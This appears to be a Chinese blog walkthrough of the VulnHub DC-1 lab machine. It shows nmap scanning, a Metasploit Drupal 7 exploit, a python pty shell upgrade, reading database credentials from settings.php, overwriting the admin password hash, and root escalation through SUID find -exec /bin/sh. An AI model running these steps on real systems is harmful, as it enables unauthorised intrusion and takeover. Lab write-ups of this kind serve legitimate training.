kali dc-1 通关报告

最新推荐文章于 2024-11-08 14:34:47 发布
最新推荐文章于 2024-11-08 14:34:47 发布
阅读量628 收藏 14
点赞数 7
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84076530/article/details/142442156
版权
  • DC1环境

1.DC1靶机,下载地址:https://download.vulnhub.com/dc/DC-1.zip

二.开始通关

1.打开虚拟机,进行信息收集

DC1靶机的ip我们不清楚,利用ifconfig查看自己的虚拟机ip

-sP是只扫描在线的主机,不扫描端口nmap -sP 192.168.211.0/24

  1. 收集信息,查看端口和服务

-A所有信息(系统版本有哪些端口等等)

-v他会给出扫描过程中的详细信息 -p指定地址或端口

nmap -A -p- -v 192.168.***.***(后两位是DC1的IP同样每人不相同)

发现了22算口开放了ssh服务

80端口发现web服务

111端口开放了rpcbind服务

访问web站点(是CD1的ip,不是自己的Ip)

发现是电信的drupal服务通过nmap可得知当前运行的是dtupsl 7的cms

可以去网上搜drupal 7的漏洞

得知需要利用MSF渗透

  1. 进入MSF控制台,查询drupal模块

进入控制台命令Msfconsol

命令Search drupal

  1. 选择模块进行测试

这里需要选择2018测试,use选择模块use 1

  1. 设置靶机(虚拟机这里是CD1的ip)运行MSF

Set rhosts 192.168.***.***(注意是CD1的ip地址)

run运行漏洞

执行whoami显示当前用户权限,然后进入的是shell

发现他是www-data权限,进入home目录下cd /home,ls查看发现有flag4文件,用cd flag4切换到flag4路径下,然后ls查看,发现flag4.txt,用cat flag4.txt进入文件查看

大致意思是没有权限,需要提权

  1. 这里用Python改变shell的类型

python -c "import pty;pty.spawn('/bin/bash')"

  1. 发现flag1文件

查看www目录下发现flag1文件,打开发现需要寻找drupal默认路径

Cd /var/www

ls

cat flag1.txt(打开flag1t.t文件)

到浏览器搜索drupal的默认路径

发现drupal的默认的配置文件是

cat /var/www/sites/default//settings.php

发现了flag2与数据库的账号和密码,提示需要提升为root权限

进入数据库

账号‘username’ => ‘dbuser’,

密码‘password’ => ‘R0ck3t’,

mysql -u dbuser -p(需要要输入数据库密码)

进入数据库,再进入到drupaldb数据库

use drupaldb

查询默认的drupal user表

Select * from users;

发现账号,不知道密码

解决方法,置换drupal密码

退出msql进入www目录下

quit;(退出)

在www目录下执行

php scripts/password-hash.sh 新密码(自己设)

然后再进入msql数据库中进行密码替换,进入msql,输入密码在切换到drupaldb数据库

mysql -u dbuser -pR0ck3t(不用在输入密码了-p已经带上了)

use drupaldb(切换到此数据库)

将pass字段进行替换

update users set pass=" $S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw " where name="admin";有空格

update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";没有空格

  1. 进入站点输入账号admin (账号固定)密码123(自己设的)
  2. 进入之后随便看看发现flag3,打开就出现

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

大概的意思就是提权,通过-exec,想到suid授权find

Find / -perm -4000 2>/dev/null(发现find命令)

发现root权限

touch 123(创建新的文件)

Ls(查看)

Find / -name 123 -exec "whoami" \;(查看有没有root权限)

  1. 发现最后的flag文件

我们切换语句进入shcll,使用whoami查看当前权限,在使用ls查看当前目录下文件

在切换到root目录下ls查看文件,发现thefinalflag.txt文件

Find ./ -name 123 -exec "/bin/sh" \;

Whoami(查看当前权限)Ls(查看)

Cd /root(切换到root目录)Ls(查看)

Cat thefinalflag.txt  (打开这个文件)                                                                      

2401_84076530
关注
DC-1 靶机笔记
MZa1213123的博客
02-21 1225
1、搭建好靶机后,由于采用的是桥接模式,前对网段快速 ping 一下,(因为试过很多次 nmap 都要等很久,不知道什么原因)。也可用 sudo arp-scan -l 查看 arp 缓存得知目的主机的 ip 地址,前提是要在桥接模式。 2、使用 nmap 进行信息收集 可知 80 端口有 drupal 搭建的网站,而且是 drupal 7 经过在网上的一番搜索如何入手时 都是使用 msfconsole 对 drupal 进行渗透 对 drupal 在 msfconsole 中 .
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1458
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
dc-1靶机
qq_63267612的博客
09-28 1338
显示修改成功,尝试去登陆发现登陆失败,这里显示的密码是加密过的,尝试去找到drupaldb的加密方式,然后把密码更改为一个加密过的但是是已知的密码。可以看到开放了ssh端口和http和111端口,尝试查看一下网站,有一个登陆框,尝试sql注入,发现没有用,不过可以从界面发现cms是drupal。使用说明:下载后解压后得到一个ova的文件,在vm虚拟机中直接打开设置好相关的设置,配置好之后,注意靶机和kali的网络设置调换成NAT模式。知道了cms是drupal,drupal有一些可以利用的漏洞进入msf。
DC1通关详解
2402_84651472的博客
09-20 848
发现他是www-data权限,进入home目录下cd /home(cd是切换路径)ls(查看)发现flag4文件,在cd flag4切换到flag4路径下ls(查看)发现flag4.txt,在进行cat flag4.txt进入文件查看cat(进入文件内)Cat thefinalflag.txt (打开这个文件)nmap -A -p- -v 192.168.***.***(后两位是DC1的IP同样每人不相同)cat /var/www/sites/default//settings.php(查看内容)
2024kali上打DC-1靶场
2301_80110280的博客
07-16 849
Current Setting是目前设置的内容 Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置 就上面来说RHOSTS需要set,但是没有内容 所以接着我们来设置一下RHOSTS内容(就是攻击目标IP地址,靶场地址)
DC-1靶机搭建与渗透过程
qq_63034068的博客
07-16 549
我们可以利用python实现互交shell,这样就好看一点,使用的前提是攻击主机上必须装有python。所以我们的靶机DC-1的ip为192.168.201.140。这里我们看到它的80端口是打开的,于是我们去访问这个服务器。我们用123456的hash将admin的给覆盖掉。我们看到了flag2的文件以及数据库的相关信息。我们随便看一看发现里面有一个flag3的文件。发现没有于是我们去找Drupal的配置文件。我们利用hash将admin的密码给修改掉。我们看到一个flag的文件我们打开看一看。
kali dc-2通关报告
2401_84076530的博客
09-27 616
根据flag1可以用暴力破解账号密码,可以使用两个代码分别是cewl http://dc-2/ -w dict.txt 或者 cewl http://dc-2/ > 1.txt。输入 cd /home/tom usr/bin发现进不去,在使用 ls /home/tom usr/bin。wpscan --url http://dc-2 --enumerate u 来尝试利用枚举爆破密码。输入tom的密码,输入su - jerry再输入jerry的密码再输入sudo -l。
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3078
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
vulnhub-DC系列通关DC1靶机渗透
qq_35258210的博客
02-07 1715
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
vulnhub-DC系列通关DC3靶机渗透
qq_35258210的博客
02-15 601
声明:此文章仅供参考学习,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。 目录 明确目标 信息收集 whatweb指纹识别工具 dirb目录扫描工具 joomscan(joomla框架专门的漏洞扫描器) searchsploit Ndya搜索工具 渗透攻击 sqlmap使用 john密码爆破工具 后渗透 提权&flag ----nc瑞士军刀工具 靶机汇总:https://blog.csdn.net/qq_35258210/article/d
DC-1靶场实战-详细步骤
xt_beginner的博客
01-10 1061
DC-1靶场通关 一、搭建DC-1靶场 详情请看https://blog.csdn.net/xt_beginner/article/details/112442901 二、DC-1靶场攻略 使用nmap快速识别目标主机ip nmap -sP 192.168.74.0/24或arp-scan -l 得到信息:目标主机192.168.74.138 使用nmap快速识别目标主机服务,端口等 nmap -sS -A -p- 192.168.74.138 得到信息:目标主机开放22
DC 靶机
niqiu320的博客
05-12 4220
DC-1实战 大致流程(copy博客为lainwith的) 环境kali 1、首先ifconfig 得知ip为192.168.149.xxx/ 2、局域网探测arp-scan -l 得知靶机ip为192.168.149.147 3、扫描端口nmap -sV -p- 192.168.149.147,查看端口信息,得知80端口开放,浏览器访问80端口查看 4、目录遍历dirb http://192.168.149.147,无可用信息 5.、启动Metersploit来查看漏洞并利用漏洞msfconsole 6
DC-1靶机实战和分析
weixin_48202759的博客
08-31 1028
前言 我们都知道,对靶机的渗透,可以宽阔自己的解题思路,练习并熟悉相关操作命令,提高自己的能力。下面我就对Vulnhub的DC-1靶机进行渗透,靶机设置了5个flag,咱们依次找到它。并通过图文形式讲解涉及到的相关知识点。DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 目标机IP地址:198.162.9.138 攻击机kali IP地址:198.132.9.129 目标探测 渗透测试的第一步,是信息收集,这一步很重要,关系到后面的渗透步骤。下面我们对
linux长时间运行任务中断报警trap
最新发布
djl的专栏,blog.djl.cx好记
11-08 189
每天要运行的定时任务, 时间很长, 有一天突然被中断了, 如果能有个中断提醒就好了。sleep 命令模拟一个长时间运行的任务,并在后台运行它。wait 命令等待任务完成或被杀死,并检查。wait 命令的退出状态码来判断脚本是否被。在这个脚本中,我们使用。
Linux下的systemd/service
zxz_Fine的博客
11-05 568
开机自启任务
linux rocky 9.4部署和管理docker harbor私有源
xikui1551的博客
11-08 578
rocky 部署Harbor私有镜像仓库
linux-find和zgrep
luxideyao的专栏
11-07 291
命令本身并不支持递归搜索,它只能搜索单个压缩文件。但是,你可以结合使用。如果你想要搜索所有类型的压缩文件,你可以使用。是你想要搜索的目录的路径。是你想要搜索的文本模式,文件,你可能需要使用。文件并搜索其中的内容。作为输入文件的占位符。
Linux kernel 源码下载与源码在线阅读地址及其相关资源网站
代码背包客的博客
11-06 395
Linux内核源码的下载地址和在线阅读方式有多种,下面是一些与之相关的网址。同时也包含一些与kernel相关的一些资源网站,供大家参考学习!
kali simple-cdd
01-05
Kali simple-cdd 是一种定制 Kali Linux 安装光盘的工具。它可以帮助用户根据自己的需求和偏好创建一个特定的 Kali Linux 安装光盘。通过 simple-cdd,用户可以选择他们需要的软件包、工具和配置,然后生成一个定制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值